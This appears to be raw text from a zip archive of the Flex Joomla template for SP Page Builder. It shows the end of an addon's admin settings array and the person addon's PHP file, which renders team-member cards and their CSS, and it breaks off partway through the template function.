					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_ICON_SIZE_DESC'),
					'placeholder'=>32,
					'std'=>32,
				),
				*/
				
				'icon_size'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_ICON_SIZE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_ICON_SIZE_DESC'),
					'min'=>16,
					'max'=>500,
					'std'=>32
				),
				
				'separator2'=>array(
					'type'=>'separator', 
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_PIE_PROGRESS_CONTENT'),
					),

				'title'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_DESC'),
					'std'=> 'Pie Progress'
				),

				'title_font_family'=>array(
					'type'=>'fonts',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_FAMILY'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_FAMILY_DESC'),
					'depends'=>array(array('title', '!=', '')),
					'selector'=> array(
						'type'=>'font',
						'font'=>'{{ VALUE }}',
						'css'=>'.sppb-addon-title { font-family: {{ VALUE }}; }'
					)
				),
				
				'heading_selector'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_DESC'),
					'values'=>array(
						'h1'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H1'),
						'h2'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H2'),
						'h3'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H3'),
						'h4'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H4'),
						'h5'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H5'),
						'h6'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H6'),
					),
					'std'=>'h3',
					'depends'=>array(array('title', '!=', '')),
				),
	
				'title_fontsize'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_SIZE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_SIZE_DESC'),
					'depends'=>array(array('title', '!=', '')),
					'min'=>12,
					'max'=>100,
					'std'=>26
				),
	
				'title_lineheight'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_LINE_HEIGHT'),
					'depends'=>array(array('title', '!=', '')),
					'min'=>12,
					'max'=>100,
					'std'=>26
				),
	
				'title_fontstyle'=>array(
					'type'=>'select',
					'title'=> JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_STYLE'),
					'values'=>array(
						'underline'=> JText::_('COM_SPPAGEBUILDER_GLOBAL_FONT_STYLE_UNDERLINE'),
						'uppercase'=> JText::_('COM_SPPAGEBUILDER_GLOBAL_FONT_STYLE_UPPERCASE'),
						'italic'=> JText::_('COM_SPPAGEBUILDER_GLOBAL_FONT_STYLE_ITALIC'),
						'lighter'=> JText::_('COM_SPPAGEBUILDER_GLOBAL_FONT_STYLE_LIGHTER'),
						'normal'=> JText::_('COM_SPPAGEBUILDER_GLOBAL_FONT_STYLE_NORMAL'),
						'bold'=> JText::_('COM_SPPAGEBUILDER_GLOBAL_FONT_STYLE_BOLD'),
						'bolder'=> JText::_('COM_SPPAGEBUILDER_GLOBAL_FONT_STYLE_BOLDER'),
					),
					'multiple'=>true,
					'std'=>'',
					'depends'=>array(array('title', '!=', '')),
				),
	
				'title_letterspace'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LETTER_SPACING'),
					'values'=>array(
						'0'=> 'Default',
						'1px'=> '1px',
						'2px'=> '2px',
						'3px'=> '3px',
						'4px'=> '4px',
						'5px'=> '5px',
						'6px'=>	'6px',
						'7px'=>	'7px',
						'8px'=>	'8px',
						'9px'=>	'9px',
						'10px'=> '10px'
					),
					'std'=>'0',
					'depends'=>array(array('title', '!=', '')),
				),
	
				'title_fontweight'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_WEIGHT'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_WEIGHT_DESC'),
					'std'=>'',
					'depends'=>array(array('title', '!=', '')),
				),
	
				'title_text_color'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_TEXT_COLOR'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_TEXT_COLOR_DESC'),
					'depends'=>array(array('title', '!=', '')),
				),
	
				'title_margin_top'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_MARGIN_TOP'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_MARGIN_TOP_DESC'),
					'placeholder'=>'10',
					'depends'=>array(array('title', '!=', '')),
					'min'=>1,
					'max'=>50,
					'std'=>10
				),
	
				'title_margin_bottom'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_MARGIN_BOTTOM'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_MARGIN_BOTTOM_DESC'),
					'placeholder'=>'10',
					'depends'=>array(array('title', '!=', '')),
					'min'=>1,
					'max'=>50,
					'std'=>10
				),

				'text'=>array(
					'type'=>'editor',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_CONTENT'),
					'std'=>'Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer adipiscing erat eget risus sollicitudin pellentesque et non erat.'
				),

				'text_font_family'=>array(
					'type'=>'fonts',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_CONTENT_FONT_FAMILY'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_CONTENT_FONT_FAMILY_DESC'),
					'depends'=>array(array('text', '!=', '')),
					'selector'=> array(
						'type'=>'font',
						'font'=>'{{ VALUE }}',
						'css'=>'.sppb-addon-text { font-family: {{ VALUE }}; }'
					)
				),

				'class'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_CLASS'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_CLASS_DESC'),
					'std'=>''
				),

			),
		),
	)
);
PK!I���	�	�)flex/sppagebuilder/addons/person/site.phpnu&1i�<?php
/**
 * Flex @package SP Page Builder
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2020 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
// no direct access
defined ('_JEXEC') or die ('Restricted access');

class SppagebuilderAddonPerson extends SppagebuilderAddons{

	public function render() {
		
		// Include template's params
		$tpl_params 	= JFactory::getApplication()->getTemplate(true)->params;
		$has_lazyload = $tpl_params->get('lazyload', 1);
		
		$settings = $this->addon->settings;
		$class = (isset($settings->class) && $settings->class) ? $settings->class : '';
		
		$type = (isset($settings->type) && $settings->type) ? $settings->type : '';

		//Options
		$image = (isset($settings->image) && $settings->image) ? $settings->image : '';
		$image_src = isset($image->src) ? $image->src : $image;
		$image_width = (isset($image->width) && $image->width) ? $image->width : '';
		$image_height = (isset($image->height) && $image->height) ? $image->height : '';

		$name 				= (isset($settings->name) && $settings->name) ? $settings->name : '';
		$designation 	= (isset($settings->designation) && $settings->designation) ? $settings->designation : '';
		$email 				= (isset($settings->email) && $settings->email) ? $settings->email : '';
		$introtext 		= (isset($settings->introtext) && $settings->introtext) ? $settings->introtext : '';
		$facebook 		= (isset($settings->facebook) && $settings->facebook) ? $settings->facebook : '';
		$twitter 			= (isset($settings->twitter) && $settings->twitter) ? $settings->twitter : '';
		$google_plus 	= (isset($settings->google_plus) && $settings->google_plus) ? $settings->google_plus : '';
		$youtube 			= (isset($settings->youtube) && $settings->youtube) ? $settings->youtube : '';
		$linkedin 		= (isset($settings->linkedin) && $settings->linkedin) ? $settings->linkedin : '';
		$pinterest 		= (isset($settings->pinterest) && $settings->pinterest) ? $settings->pinterest : '';
		$flickr 			= (isset($settings->flickr) && $settings->flickr) ? $settings->flickr : '';
		$dribbble 		= (isset($settings->dribbble) && $settings->dribbble) ? $settings->dribbble : '';
		$behance 			= (isset($settings->behance) && $settings->behance) ? $settings->behance : '';
		$instagram 		= (isset($settings->instagram) && $settings->instagram) ? $settings->instagram : '';
		$social_position = (isset($settings->social_position) && $settings->social_position) ? $settings->social_position : '';
		$alignment 		= (isset($settings->alignment) && $settings->alignment) ? $settings->alignment : '';
		
		$background 		= (isset($this->addon->settings->background) && $this->addon->settings->background) ? $this->addon->settings->background : '';
		
		$output = '';
		$social_icons = '';
		$person_background = '';
		
		
		$person_style_preset 		= (isset($settings->person_style_preset) && $settings->person_style_preset) ? $settings->person_style_preset : '';
		$content_position = '';
		if($person_style_preset=='layout1'){
			$content_position = 'person-content-position-bottom-left';
		} elseif($person_style_preset=='layout2'){
			$content_position = 'person-content-position-half-overlay';
		} elseif($person_style_preset=='layout3'){
			$content_position = 'person-content-position-full-overlay';
		}
		//Lazyload image
		$placeholder = $image_src == '' ? false : $this->get_image_placeholder($image_src);
	
		if(strpos($image_src, "http://") !== false || strpos($image_src, "https://") !== false){
			$image_src = $image_src;
		} else {
			if($image_src){
				$image_src = JURI::base(true) . '/' . $image_src;
			}
		}
		
		//Output start
		$output = '';
		$social_icons = '';

		if($facebook || $twitter || $youtube || $linkedin || $pinterest || $flickr || $dribbble || $behance || $instagram) {
			$social_icons  	.= '<div class="sppb-person-social-icons">';
			$social_icons 	.= '<ul class="sppb-person-social">';

				if($facebook) 		$social_icons .= '<li><a target="_blank" rel="noopener noreferrer" href="' . $facebook . '" aria-label="Facebook"><i class="fab fa-facebook-f" aria-hidden="true" title="Facebook"></i></a></li>';
				if($twitter) 		$social_icons .= '<li><a target="_blank" rel="noopener noreferrer" href="' . $twitter . '" aria-label="Twitter"><i class="fab fa-twitter" aria-hidden="true" title="Twitter"></i></a></li>';
				if($youtube) 		$social_icons .= '<li><a target="_blank" rel="noopener noreferrer" href="' . $youtube . '" aria-label="YouTube"><i class="fab fa-youtube" aria-hidden="true" title="YouTube"></i></a></li>';
				if($linkedin) 		$social_icons .= '<li><a target="_blank" rel="noopener noreferrer" href="' . $linkedin . '" aria-label="LinkedIn"><i class="fab fa-linkedin-in" aria-hidden="true" title="LinkedIn"></i></a></li>';
				if($pinterest) 		$social_icons .= '<li><a target="_blank" rel="noopener noreferrer" href="' . $pinterest . '" aria-label="Pinterest"><i class="fab fa-pinterest" aria-hidden="true" title="Pinterest"></i></a></li>';
				if($flickr) 		$social_icons .= '<li><a target="_blank" rel="noopener noreferrer" href="' . $flickr . '" aria-label="Flickr"><i class="fab fa-flickr" aria-hidden="true" title="Flickr"></i></a></li>';
				if($dribbble) 		$social_icons .= '<li><a target="_blank" rel="noopener noreferrer" href="' . $dribbble . '" aria-label="Dribble"><i class="fab fa-dribbble" aria-hidden="true" title="Dribble"></i></a></li>';
				if($behance) 		$social_icons .= '<li><a target="_blank" rel="noopener noreferrer" href="' . $behance . '" aria-label="Behance"><i class="fab fa-behance" aria-hidden="true" title="Behance"></i></a></li>';
				if($instagram) 		$social_icons .= '<li><a target="_blank" rel="noopener noreferrer" href="' . $instagram . '" aria-label="Instagram"><i class="fab fa-instagram" aria-hidden="true" title="Instagram"></i></a></li>';
			
			$social_icons 	.= '</ul>';
			$social_icons 	.= '</div>';
		}
		
		if($background) {
			$person_background = ' style="background-color:' . $background . ';padding:0 0 12px;"';
		} 
		
		if($type != 'default') {
		//if($type != 'default' && $type != ''){
			// Front content
			$output  .= '<div class="flex flip-container" ontouchstart="this.classList.toggle("hover");"><div class="flipper"><div'.$person_background.' class="front ' . $class . '">';
			$output  .= '<div class="sppb-addon sppb-addon-person ' . $alignment . '">';
			$output  .= '<div class="sppb-addon-content">';
			
			if($image_src) {
				$output  .= '<div class="sppb-person-image">';
				// Image
				$output  .= '<img class="sppb-img-responsive" src="' . $image_src . '" alt="' . $name . '">';
				$output  .= '</div>';
			}
	
			if($name || $designation) {
				$output  .= '<div class="sppb-person-information">';
				if($name) $output  .= '<span class="sppb-person-name">' . $name . '</span>';
				if($designation) $output  .= '<span class="sppb-person-designation">' . $designation . '</span>';
				$output  .= '</div>';
			}
			$output  .= '</div>';
			$output  .= '</div>';
			$output  .= '</div>';
			
		
			// Back content
			$output  .= '<div'.$person_background.' class="back ' . $class . '">';
			
			$output  .= '<div class="sppb-addon sppb-addon-person ' . $alignment . '">';
			$output  .= '<div class="sppb-addon-content">';
			
	
			
			if($name || $designation) {
				if($type != 'flip') {	
					$output  .= '<div class="sppb-person-block">';
				} else {
					$output  .= '<div class="sppb-person-block flip">';
				}
				if($type != 'flip') {
					if($image) {	
					
						$output  .= '<div class="thumb">';	
						// Image
						/* Lazyload for images with absolute URL */
						if($has_lazyload) {
							$output .= '<img class="lazyload sppb-img-responsive" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" data-src="'. $image_src .'" alt="'.$name.'">';
						} else {
							$output .= '<img class="sppb-img-responsive" src="' . $image_src . '" alt="' . $name . '">';	
						}
						
						$output  .= '</div>';
					}
				}
				if($type != 'flip') {	
					$output  .= '<div class="sppb-person-information">';
				} else {
					$output  .= '<div class="sppb-person-information flip">';
				}
				if($name) $output  .= '<span class="sppb-person-name">' . $name . '</span>';
				if($designation) $output  .= '<span class="sppb-person-designation">' . $designation . '</span>';
				$output  .= '</div>';
				$output  .= '</div>';
			}
			
			if($social_position=='before') $output .= $social_icons;
	
			if($introtext) { 
				$output  .= '<div class="sppb-person-introtext">' . $introtext . '</div>';
				if($type != 'flip') {
					$output  .= '<hr />';
				}
			}
	
			if($social_position=='after') $output .= $social_icons;
			
			$output  .= '</div>';
			$output  .= '</div>';
			
			$output  .= '</div>';
			
			$output  .= '</div></div>';
			
			return $output;
		
		} else {

			$output  .= '<div class="sppb-addon sppb-addon-person ' . $alignment . ' ' . $class . ' '.$content_position.'">';
			$output  .= '<div class="sppb-addon-content">';
			if($person_style_preset=='layout4'){
				$output  .= '<div class="sppb-row sppb-no-gutter">';
					$output  .= '<div class="sppb-col-sm-5">';
			}
			if($image_src) {
					$output  .= '<div class="sppb-person-image '.($person_style_preset=='layout4'?'person-layout-4':'').'">';
					$output  .= '<img class="sppb-img-responsive'.($placeholder ? ' sppb-element-lazy' : '').'" src="' . ($placeholder ? $placeholder : $image_src) . '" alt="'. $name .'" '.($placeholder ? 'data-large="'.$image_src.'"' : '').' '.($image_width ? 'width="'.$image_width.'"' : '').' '.($image_height ? 'height="'.$image_height.'"' : '').' loading="lazy">';
					if($person_style_preset!==''){
						if($person_style_preset!=='layout4'){
							$output  .= '<div class="person-content-show-on-hover">';
							$output  .= '<div class="person-content-hover-content-wrap">';
							if($person_style_preset=='layout1'){
								if($social_position=='before') $output .= $social_icons;
								if($introtext) $output  .= '<div class="sppb-person-introtext">' . $introtext . '</div>';
								if($social_position=='after') $output .= $social_icons;
							}
							if($person_style_preset=='layout2' || $person_style_preset=='layout3'){
								if($name || $designation) {
									if($name) $output  .= '<span class="sppb-person-name">' . $name . '</span>';
									if($designation) $output  .= '<span class="sppb-person-designation">' . $designation . '</span>';
									if($social_icons) $output .= $social_icons;
								}
							}
							$output  .= '</div>';
							$output  .= '</div>';
						}
					}
					$output  .= '</div>';//.sppb-person-image
			}
			if($person_style_preset=='layout4'){
				$output  .= '</div>';
				$output  .= '<div class="sppb-col-sm-7">';
				$output  .= '<div class="sppb-person-addon-content-wrap">';
			}
			if($person_style_preset !=='layout2' && $person_style_preset !=='layout3') {
				if($name || $designation || $email) {
					$output  .= '<div class="sppb-person-information">';
					if($name) $output  .= '<span class="sppb-person-name">' . $name . '</span>';
					if($designation) $output  .= '<span class="sppb-person-designation">' . $designation . '</span>';
					if($email) $output  .= '<a href="mailto:' . $email . '" class="sppb-person-email">' . $email . '</a>';
					$output  .= '</div>';
				}
			}

			if($person_style_preset !=='layout1' && $person_style_preset !=='layout2' && $person_style_preset !=='layout3'){
				if($social_position=='before') $output .= $social_icons;
				if($introtext) $output  .= '<div class="sppb-person-introtext">' . $introtext . '</div>';
				if($social_position=='after') $output .= $social_icons;
			}
			if($person_style_preset=='layout4'){
				$output  .= '</div>';
				$output  .= '</div>';
			$output  .= '</div>';
			}
			$output  .= '</div>';
			$output  .= '</div>';
			
			return $output;
		}
	}

	public function css() {
		$settings = $this->addon->settings;
		$addon_id = '#sppb-addon-' . $this->addon->id;

		$border_radius = (isset($settings->image_border_radius) && $settings->image_border_radius) ? 'border-radius:' . $settings->image_border_radius . 'px' : '';

		//Overlay
		$content_overlay_type = (isset($settings->content_overlay_type) && $settings->content_overlay_type) ? $settings->content_overlay_type : '';
		$content_overlay_color = (isset($settings->content_overlay_color) && $settings->content_overlay_color) ? $settings->content_overlay_color : '';
		//Gradient overlay
		$content_overlay_gradient = (isset($settings->content_overlay_gradient) && $settings->content_overlay_gradient) ? $settings->content_overlay_gradient : '';
		$gradient_color1 = (isset($content_overlay_gradient->color) && $content_overlay_gradient->color) ? $content_overlay_gradient->color : 'rgba(127, 0, 255, 0.8)';
		$gradient_color2 = (isset($content_overlay_gradient->color2) && $content_overlay_gradient->color2) ? $content_overlay_gradient->color2 : 'rgba(225, 0, 255, 0.7)';
		$gradient_degree = (isset($content_overlay_gradient->deg) && $content_overlay_gradient->deg) ? $content_overlay_gradient->deg : '';
		$gradient_type = (isset($content_overlay_gradient->type) && $content_overlay_gradient->type) ? $content_overlay_gradient->type : 'linear';
		$gradient_radialPos = (isset($content_overlay_gradient->radialPos) && $content_overlay_gradient->radialPos) ? $content_overlay_gradient->radialPos : 'Center Center';
		$gradient_radial_angle1 = (isset($content_overlay_gradient->pos) && $content_overlay_gradient->pos) ? $content_overlay_gradient->pos : '0';
		$gradient_radial_angle2 = (isset($content_overlay_gradient->pos2) && $content_overlay_gradient->pos2) ? $content_overlay_gradient->pos2 : '100';
		//Css start
		$css = '';
		if($content_overlay_type !== "none") {
			if($content_overlay_color && $content_overlay_type !== 'gradient'){
				$css .= $addon_id . ' .person-content-show-on-hover {';
					$css .= 'background:'.$content_overlay_color.';';
				$css .='}';
			}
			if($content_overlay_gradient && $content_overlay_type !== 'color'){
				$css .= $addon_id . ' .person-content-show-on-hover {';
					if($gradient_type!=='radial'){
						$css .= 'background: -webkit-linear-gradient('.$gradient_degree.'deg, '.$gradient_color1.' '.$gradient_radial_angle1.'%, '.$gradient_color2.' '.$gradient_radial_angle2.'%) transparent;';
						$css .= 'background: linear-gradient('.$gradient_degree.'deg, '.$gradient_color1.' '.$gradient_radial_angle1.'%, '.$gradient_color2.' '.$gradient_radial_angle2.'%) transparent;';
					} else {
						$css .= 'background: -webkit-radial-gradient(at '.$hover_radialPos.', '.$gradient_color1.' '.$gradient_radial_angle1.'%, '.$gradient_color2.' '.$gradient_radial_angle2.'%) transparent;';
						$css .= 'background: radial-gradient(at '.$hover_radialPos.', '.$gradient_color1.' '.$gradient_radial_angle1.'%, '.$gradient_color2.' '.$gradient_radial_angle2.'%) transparent;';
					}
				$css .='}';
			}
		}
		if($border_radius) {
			$css .= $addon_id . ' .sppb-person-image img {';
			$css .= $border_radius;
			$css .= "\n" . '}' . "\n"	;
		}
		//Preset style
		$person_style_preset = (isset($settings->person_style_preset) && $settings->person_style_preset) ? $settings->person_style_preset : '';
		$name_desig_bg = (isset($settings->name_desig_bg) && $settings->name_desig_bg) ? $settings->name_desig_bg : '';
		$name_desig_padding = (isset($settings->name_desig_padding) && trim($settings->name_desig_padding)) ? $settings->name_desig_padding : '';
		if($person_style_preset=='layout1'){
			if($name_desig_bg || $name_desig_padding) {
				$css .= $addon_id . ' .person-content-position-bottom-left .sppb-person-information {';
				$css .= 'background:'.$name_desig_bg.';';
				$css .= 'padding:'.$name_desig_padding.';';
				$css .= '}';
			}
		}
		//Name style
		$name_color = (isset($settings->name_color) && $settings->name_color) ? 'color:' . $settings->name_color : '';
		$name_style = '';
		$name_style .= (isset($settings->name_fontsize) && $settings->name_fontsize) ? 'font-size:' . $settings->name_fontsize. 'px;' : '';
		$name_style .= (isset($settings->name_lineheight) && $settings->name_lineheight) ? 'line-height:' . $settings->name_lineheight. 'px;' : '';
		$name_style .= (isset($settings->name_letterspace) && $settings->name_letterspace) ? 'letter-spacing:' . $settings->name_letterspace. ';' : '';
		$name_font_style = (isset($settings->name_font_style) && $settings->name_font_style) ?  $settings->name_font_style : '';
		if(isset($name_font_style->underline) && $name_font_style->underline){
			$name_style .= 'text-decoration:underline;';
		}
		if(isset($name_font_style->italic) && $name_font_style->italic){
			$name_style .= 'font-style:italic;';
		}
		if(isset($name_font_style->uppercase) && $name_font_style->uppercase){
			$name_style .= 'text-transform:uppercase;';
		}
		if(isset($name_font_style->weight) && $name_font_style->weight){
			$name_style .= 'font-weight:'.$name_font_style->weight.';';
		}
		if($name_color || $name_style) {
			$css .= $addon_id . ' .sppb-person-name {';
			$css .= $name_color.';';
			$css .= $name_style;
			$css .= '}';
		}
		//Designation style
		$designation_color = (isset($settings->designation_color) && $settings->designation_color) ? 'color:' . $settings->designation_color : '';
		$designation_style = '';
		$designation_style .= (isset($settings->designation_fontsize) && $settings->designation_fontsize) ? 'font-size:' . $settings->designation_fontsize. 'px;' : '';
		$designation_style .= (isset($settings->designation_lineheight) && $settings->designation_lineheight) ? 'line-height:' . $settings->designation_lineheight. 'px;' : '';
		$designation_style .= (isset($settings->designation_letterspace) && $settings->designation_letterspace) ? 'letter-spacing:' . $settings->designation_letterspace. ';' : '';
		$designation_style .= (isset($settings->designation_margin) && trim($settings->designation_margin)) ? 'margin:' . $settings->designation_margin. ';' : '';
		$designation_font_style = (isset($settings->designation_font_style) && $settings->designation_font_style) ?  $settings->designation_font_style : '';
		if(isset($designation_font_style->underline) && $designation_font_style->underline){
			$designation_style .= 'text-decoration:underline;';
		}
		if(isset($designation_font_style->italic) && $designation_font_style->italic){
			$designation_style .= 'font-style:italic;';
		}
		if(isset($designation_font_style->uppercase) && $designation_font_style->uppercase){
			$designation_style .= 'text-transform:uppercase;';
		}
		if(isset($designation_font_style->weight) && $designation_font_style->weight){
			$designation_style .= 'font-weight:'.$designation_font_style->weight.';';
		}
		if($designation_color || $designation_style) {
			$css .= $addon_id . ' .sppb-person-designation {';
			$css .= $designation_color.';';
			$css .= $designation_style;
			$css .= '}';
		}
		//Introtext style
		$introtext_style = '';
		$introtext_style .= (isset($settings->introtext_color) && $settings->introtext_color) ? 'color:' . $settings->introtext_color.';' : '';
		$introtext_style .= (isset($settings->introtext_fontsize) && $settings->introtext_fontsize) ? 'font-size:' . $settings->introtext_fontsize.'px;' : '';
		$introtext_style .= (isset($settings->introtext_lineheight) && $settings->introtext_lineheight) ? 'line-height:' . $settings->introtext_lineheight.'px;' : '';
		if($introtext_style) {
			$css .= $addon_id . ' .sppb-person-introtext {';
			$css .= $introtext_style;
			$css .= '}';
		}
		//Social Icon style
		$social_icon_style = '';
		$social_icon_style .= (isset($settings->social_icon_color) && $settings->social_icon_color) ? 'color:' . $settings->social_icon_color.';' : '';
		$social_icon_style .= (isset($settings->social_icon_fontsize) && $settings->social_icon_fontsize) ? 'font-size:' . $settings->social_icon_fontsize.'px;' : '';
		if($social_icon_style) {
			$css .= $addon_id . ' .sppb-person-social > li > a {';
				$css .= $social_icon_style;
			$css .= '}';
		}
		$social_icon_margin = (isset($settings->social_icon_margin) && trim($settings->social_icon_margin)) ? 'margin:' . $settings->social_icon_margin.';' : '';
		if($social_icon_margin) {
			$css .= $addon_id . ' .sppb-person-social > li {';
			$css .= $social_icon_margin;
			$css .= '}';
		}
		$social_icon_hover_color = (isset($settings->social_icon_hover_color) && $settings->social_icon_hover_color) ? 'color:' . $settings->social_icon_hover_color.';' : '';
		if($social_icon_hover_color) {
			$css .= $addon_id . ' .sppb-person-social > li > a:hover {';
			$css .= $social_icon_hover_color;
			$css .= '}';
		}
		//Layout 4 content style
		$person_content_syle = '';
		$person_content_syle .= (isset($settings->person_content_bg) && $settings->person_content_bg) ? 'background:' . $settings->person_content_bg.';' : '';
		$person_content_syle .= (isset($settings->person_content_padding) && $settings->person_content_padding) ? 'padding:' . $settings->person_content_padding.';' : '';
		if($person_content_syle) {
			$css .= $addon_id . ' .sppb-person-addon-content-wrap {';
			$css .= $person_content_syle;
			$css .= '}';
		}
		//Table style
		//Name
		$name_style_sm = '';
		$name_style_sm .= (isset($settings->name_fontsize_sm) && $settings->name_fontsize_sm) ? 'font-size:' . $settings->name_fontsize_sm. 'px;' : '';
		$name_style_sm .= (isset($settings->name_lineheight_sm) && $settings->name_lineheight_sm) ? 'line-height:' . $settings->name_lineheight_sm. 'px;' : '';
		//Designation
		$designation_style_sm = '';
		$designation_style_sm .= (isset($settings->designation_fontsize_sm) && $settings->designation_fontsize_sm) ? 'font-size:' . $settings->designation_fontsize_sm. 'px;' : '';
		$designation_style_sm .= (isset($settings->designation_lineheight_sm) && $settings->designation_lineheight_sm) ? 'line-height:' . $settings->designation_lineheight_sm. 'px;' : '';
		$designation_style_sm .= (isset($settings->designation_margin_sm) && trim($settings->designation_margin_sm)) ? 'margin:' . $settings->designation_margin_sm. ';' : '';
		//Introtext
		$introtext_style_sm = '';
		$introtext_style_sm .= (isset($settings->introtext_fontsize_sm) && $settings->introtext_fontsize_sm) ? 'font-size:' . $settings->introtext_fontsize_sm.'px;' : '';
		$introtext_style_sm .= (isset($settings->introtext_lineheight_sm) && $settings->introtext_lineheight_sm) ? 'line-height:' . $settings->introtext_lineheight_sm.'px;' : '';
		//Social Icon
		$social_icon_margin_sm = (isset($settings->social_icon_margin_sm) && trim($settings->social_icon_margin_sm)) ? 'margin:' . $settings->social_icon_margin_sm.';' : '';
		//Layout 4 content style
		$person_content_padding_sm = (isset($settings->person_content_padding_sm) && $settings->person_content_padding_sm) ? 'padding:' . $settings->person_content_padding_sm.';' : '';
		
		if ($name_style_sm || $designation_style_sm || $introtext_style_sm || $social_icon_margin_sm || $person_content_padding_sm) {
            $css .= '@media (min-width: 768px) and (max-width: 991px) {';
				$css .= $addon_id . ' .sppb-person-name {' . $name_style_sm . '}';
				if($designation_style_sm) {
					$css .= $addon_id . ' .sppb-person-designation {';
					$css .= $designation_style_sm;
					$css .= '}';
				}
				if($introtext_style_sm) {
					$css .= $addon_id . ' .sppb-person-introtext {';
					$css .= $introtext_style_sm;
					$css .= '}';
				}
				if($social_icon_margin_sm) {
					$css .= $addon_id . ' .sppb-person-social > li {';
					$css .= $social_icon_margin_sm;
					$css .= '}';
				}
				if($person_content_padding_sm) {
					$css .= $addon_id . ' .sppb-person-addon-content-wrap {';
					$css .= $person_content_padding_sm;
					$css .= '}';
				}
            $css .= '}';
		}
		//Mobile Style
		//Name
		$name_style_xs = '';
		$name_style_xs .= (isset($settings->name_fontsize_xs) && $settings->name_fontsize_xs) ? 'font-size:' . $settings->name_fontsize_xs. 'px;' : '';
		$name_style_xs .= (isset($settings->name_lineheight_xs) && $settings->name_lineheight_xs) ? 'line-height:' . $settings->name_lineheight_xs. 'px;' : '';
		//Designation
		$designation_style_xs = '';
		$designation_style_xs .= (isset($settings->designation_fontsize_xs) && $settings->designation_fontsize_xs) ? 'font-size:' . $settings->designation_fontsize_xs. 'px;' : '';
		$designation_style_xs .= (isset($settings->designation_lineheight_xs) && $settings->designation_lineheight_xs) ? 'line-height:' . $settings->designation_lineheight_xs. 'px;' : '';
		$designation_style_xs .= (isset($settings->designation_margin_xs) && trim($settings->designation_margin_xs)) ? 'margin:' . $settings->designation_margin_xs. ';' : '';
		//Introtext
		$introtext_style_xs = '';
		$introtext_style_xs .= (isset($settings->introtext_fontsize_xs) && $settings->introtext_fontsize_xs) ? 'font-size:' . $settings->introtext_fontsize_xs.'px;' : '';
		$introtext_style_xs .= (isset($settings->introtext_lineheight_xs) && $settings->introtext_lineheight_xs) ? 'line-height:' . $settings->introtext_lineheight_xs.'px;' : '';
		//Social Icon
		$social_icon_margin_xs = (isset($settings->social_icon_margin_xs) && trim($settings->social_icon_margin_xs)) ? 'margin:' . $settings->social_icon_margin_xs.';' : '';
		//Layout 4 content style
		$person_content_padding_xs = (isset($settings->person_content_padding_xs) && $settings->person_content_padding_xs) ? 'padding:' . $settings->person_content_padding_xs.';' : '';

        if ($name_style_xs || $designation_style_xs || $introtext_style_xs || $person_content_padding_xs) {
            $css .= '@media (max-width: 767px) {';
				$css .= $addon_id . ' .sppb-person-name {' . $name_style_xs . '}';
				if($designation_style_xs) {
					$css .= $addon_id . ' .sppb-person-designation {';
					$css .= $designation_style_xs;
					$css .= '}';
				}
				if($introtext_style_xs) {
					$css .= $addon_id . ' .sppb-person-introtext {';
					$css .= $introtext_style_xs;
					$css .= '}';
				}
				if($social_icon_margin_xs) {
					$css .= $addon_id . ' .sppb-person-social > li {';
					$css .= $social_icon_margin_xs;
					$css .= '}';
				}
				if($person_content_padding_xs) {
					$css .= $addon_id . ' .sppb-person-addon-content-wrap {';
					$css .= $person_content_padding_xs;
					$css .= '}';
				}
            $css .= '}';
        }
		return $css;
	}

	public static function getTemplate(){

		$output ='
			<style type="text/css">
				<# 
				let gradient_color1 = (!_.isEmpty(data.content_overlay_gradient) && data.content_overlay_gradient.color) ? data.content_overlay_gradient.color : "rgba(127, 0, 255, 0.8)";
